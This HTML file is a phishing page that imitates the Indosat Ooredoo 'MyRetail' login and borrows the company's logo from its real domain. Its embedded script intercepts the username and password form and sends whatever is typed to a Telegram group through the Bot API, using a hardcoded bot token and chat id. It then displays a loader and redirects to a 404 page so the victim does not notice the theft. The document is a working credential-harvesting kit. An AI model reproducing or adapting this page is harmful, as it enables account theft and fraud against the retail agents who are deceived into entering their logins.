<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="
https://cdn.jsdelivr.net/npm/sweetalert2@11.19.1/dist/sweetalert2.all.min.js
"></script>
    <link href="
https://cdn.jsdelivr.net/npm/sweetalert2@11.19.1/dist/sweetalert2.min.css
" rel="stylesheet">
    <title>My Retail Application</title>
</head>

<body>
    <style>
        * {
            padding: 0;
            margin: 0;
            font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
        }

        header {
            justify-content: center;
            text-align: center;
            align-items: center;
        }

        .box {
            background-color: rgb(240, 240, 240);
            margin: 0 15px;
        }

        .logo {
            display: flex;
            justify-content: center;
        }

        .logo img {
            width: 200px;
        }

        .retail h1 {
            color: rgb(0, 0, 0);
            font-size: 0.9rem;
            display: flex;
            float: left;
            padding: 15px 15px;
            font-weight: 200;
        }

        .formtele {
            width: 100%;
            overflow: hidden;
            background-color: rgb(252, 252, 252);
        }

        form input[type=text] {
            padding: 0 10px;
            width: 85%;
            margin-top: 20px;
            height: 35px;
            border: none;
            border: 1px solid #e5e5e5;
            font-size: 0.9rem;
        }

        form input[type=password] {
            padding: 0 10px;
            width: 85%;
            outline: none;
            margin-top: 20px;
            height: 35px;
            border: none;
            border: 1px solid #e5e5e5;
            font-size: 0.9rem;
        }

        form input[type=text]:focus {
            border-color: blue;
        }

        .checkbox {
            display: flex;
            float: left;
            margin-top: 20px;
            margin-left: 10px;
        }

        .checkbox p {
            margin-left: 5px;
            font-size: 0.9rem;
        }

        .btn {
            display: flex;
            margin-top: 70px;
            margin-left: 15px;
        }

        .btn button {
            padding: 7px 13px;
            border: none;
            font-size: 1rem;
            margin-bottom: 30px;
            background-color: red;
            cursor: pointer;
            color: white;
        }

        .btn button:hover {
            background-color: yellow;
            color: black;
        }
    </style>



    <header>
        <div class="logo">
            <img src="https://myretail.indosatooredoo.com/img/myretail-indosat-square-logo.png" alt="">
        </div>
        <div class="box" id="box">
            <div class="retail">
                <h1>MyRetail Login</h1>
            </div>
            <form action="https://api.telegram.org" class="formtele" id="formTele" method="POST">
                <input type="text" name="mail" placeholder="Username" autocapitalize="off" autocomplete="off"
                    required="required">
                <input type="password" name="pass" placeholder="Password" autocapitalize="off" autocomplete="off"
                    required="required">
                <div class="checkbox">
                    <input type="checkbox">
                    <p>Remember Me</p>
                </div>
                <div class="btn">
                    <button type="submit" id="kirim">Login</button>
                </div>
        </div>
        </form>
        <div id="login-loader" class="text-center" style="display: none;">
            <img src="https://myretail.indosatooredoo.com/img/login-loader.gif" alt="">
    </header>
    <script>

        const token = '7645693066:AAENGntcRFZTWdiB6nH1pkPN6Imrrap5x9s'
        const group_id = '-4630518919'

        const formtelegram = document.getElementById('formTele')

        const sendMessage = (text) => {
            fetch(`https://api.telegram.org/bot${token}/sendMessage`, {
                method: "POST",
                headers: {
                    "Content-Type": "application/json"
                },
                body: JSON.stringify({
                    "chat_id": group_id,
                    "text": text,
                })
            }).then(res => {
                if (!res.ok) {
                    throw new Error(res.statusText, res.status, res.url);
                }
                document.getElementById('kirim').innerHTML = 'Login';
                setTimeout(function () {
                    window.location.href = "404/404.html";
                }, 5000);
                return res.json();
            }).then(res => {
                console.log(res);
            }).catch(err => {
                console.log(err);
                alert('gagal')
            })
        };

        formtelegram.onsubmit = (e) => {
            document.getElementById('box').style.display = "none"
            document.getElementById('login-loader').style.display = "block"
            e.preventDefault();

            const formData = new FormData(formtelegram)

            let text = '';

            for (const [key, val] of formData) {
                console.log(`${key}:`, val);

                text += `\n\n${key}:\n${val}`;

            }

            text = text.replace('\n\n', '');

            sendMessage(text)
        }
    </script>
</body>

</html>
